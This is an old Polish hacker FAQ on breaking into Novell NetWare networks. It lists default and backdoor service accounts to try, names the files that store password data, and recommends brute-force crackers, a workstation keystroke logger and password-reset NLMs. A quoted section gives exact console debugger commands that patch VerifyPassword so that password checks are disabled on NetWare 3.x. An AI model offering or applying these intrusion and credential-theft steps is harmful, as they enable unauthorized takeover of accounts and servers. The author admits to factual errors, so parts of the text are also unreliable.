
              	       :     "NeUroMaN FAQ Novell 1.00"     :
		       :		 FROM               :
		       :		                    :
		       :	       NeUroMaN             :
		       :	         alias              :
		       :	      Cyber_Ghost	    :

********************************************************************************

Czesc witam ponownie !
Po krotkiej przerwie zabralem sie znowu do pracy. Postanowilem napisac 
krotkie FAQ o tematyce "Hack Novell'a". Moj poprzedni tekst poswiecony
zostal haczeniu za pomoca gotowych programow (bylo to troche lamerskie)
ALe polaczenie programow z tamtego Txt'a i wiadomosci zawartych w tym 
FAQ moga byc bardzo uzyteczne i przydatne :) .

********************************************************************************
Tematy:

1. Dostepy dla wszystkich i haselka w sieci.
2. Pliki z haslami dostepow.
3. Jak zdobyc haselko ?
4. Co zrobic jak masz plik SETPWD.NLM ?
5. Bugi

********************************************************************************


1. Dostepy dla wszystkich i haselka w sieci.
Novellowskie sieci maja najczescie ustawione domyslnie dostepy (konta).
np.  
	3.x :Supervisor, Guest
	4.x :Admin, User_temp

Najczesciej instalator systemu Novella szybko zaklada haselko na Supera 
i Admina. Ale czasem zapomina on o GUEST i User_Template (najczesciej 
te dostepy maja bardzo cienkie prawa No ale warto sprobowac !).
Supervisor tworzy czasem takze konta do okreslonych funkcji systemy 
np. do poczty i drukarki. Ponizej wymienie troche takich przyladow 
wraz z opisami.

	PRINT,LASER,HPLASER,PRINTER,LASERWRITER-przydzielanie do servera dla 
						drukarki
	POST,MAIL-serwer pocztowy
	GATE,GATEWAY-polaczenie z serwerem umozliwiajacym wspolprace sieci o roznych 
   		     organizacjach.
	ROUTER-przydzielanie routera poczty do serwera sieci.
	BACKUP-stary stan sieci 
	WANGTEK-obejrzenie BACKUP'u
	ROOT-tylko dla sieci LAN
	WINDOWS_PASSTHRU-wpuszcza przez Win95 bez sprawdzenia hasla
	FAX,FAXWORKS-fax

Te dostepy storzone zostaly poto aby byly "backdoorsami" bla tych urzadzen.
Stosowane sa najczesciej dla sieci Netware 4.x.


2. Pliki z haslami dostepow.

To nie jest takie latwe jak w Unix. Wszystkie dane tego typu sa umieszczone
w plikach binarnych (dla 2.x i 3.x)i trzymane w bazie danych NDS (dla 4.x)
Powinny byc umieszczone w SYS: i w katalogu SYSTEM.
2.x- NET$BIND.SYS, NET$BVAL.SYS
3.x- NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
W Net$bval.sys i Net$val.sys sa wlasnie umieszczone hasla.

Dla Netware 4.x jest trudniej bo plik jest gdzie indziej niz SYS:
Ale uzywajac RCONSOLE mozna przeszukac serwer i obejzec ten plik
ale by mozna uzywac RCONSOLE trzeba miec SUPERVISOR'a lub siedziec przy 
serwerze. Wyglada to tak:

	VALUE.NDS-czesc NDS
	BLOCK.NDS- ---""---
	ENTRY.NDS- ---""---
	PARTITIO.NDS- partycja NDS
	MLS.000-licencja
	VALLINCEN.DAT-licencja

Sa jeszcze inne sposoby na zobaczenie tych plikow ale sa o wiele trudniejsze
i niebezpieczniejsze.


3. Jak zdobyc haselko ?

Jest kilka sposobow. Jezeli mamy wylaczone wykrywanie intruzow (INTRUDER 
DETECTION) to mozemy zdobyc te hasla metoda BRUTE FORCE (np.NWCRACK) Mozna 
zdobyc je rownierz instalujac sniffera na dysku koncowki (np.KeyTrap)
Jezeli masz dostep do konsoli lub RCONSOLE mozesz uzyc plikow :

	SETPASS.NLM dla 3.x
	SETSPWD.NLM dla 3.x, 4.x
	SETPWD.NLM dla 4.x
do odtworzenia haselek.


4. Co zrobic jak masz plik SETPWD.NLM ?

Mozesz go dowolnie modyfikowac i wprowadzic z konsoli lub RCONSOLE.
i wladowac ten plik do SYS:SYSTEM. Ale do tego numeru trzeba miec 
SUPERVISOR'a albo cos podobnego.
 

5. Bugi (sorry ze po angielsku ale sciagnalem to INTERNETU i nie chce
          nikomu nic zmieniac) Moge tylko powiedziec ze ten bug podobno
          powoduje iz nie sa sprawdzane hasla przy logowaniu. Nie probowalem.

You must be at the console to do this:

<left-shift><right-shift><alt><esc>          Enters Debugger
type "d VerifyPassword 6"    Write down 6 byte response for later use
type "c Verifypassword=B8 0 0 0 0 C3"    Sets system to turn off pword checks
type "g"    To make the system change and drop you back into the console

to turn password checking back on...

<left-shift><right-shift><alt><esc>          Enters Debugger
type "c VerifyPassword= xx xx xx xx xx xx"   Where xx's are the previous 
recorded numbers that where written down.
type "g"   To make system changes and drop you back to into the console

Teiwaz updated these steps to make things easier and workable. And one other
note -- this will NOT work in 4.x. Sorry....

6.Adnotacje
Ten FAQ jest moze lamerowaty ale nie musisz go wcale czytac. No nie ?
Sorry ze jest w nim pelno bledow ale napisalem go w niecale 1,5h
 (Musialem sobie te wszystkie bajery przypomniec)
Wszystkich rzeczy dokaldnie nie pamietam wiec sorry z bledy rzeczowe.

Jezeli bedziesz czegos chcial od NeUroMaN'a (czyli mnie) to smialo 
pisz na :  cghost@polbox.com


Greetz: dla #hackpl, #phreakpl, #Poznan, dla Rmoro,P0wera,3mila,Lcamtufa
	Wiedzmina,Tanisa,c64,bTh,coda.Da_Worm'a, Fujja, nTh, Ultor'a
        Spac3man'a,ms47,Arenusa. Dla edyty17, doroty i wszystkich 
        ktorzy mnie znaja.




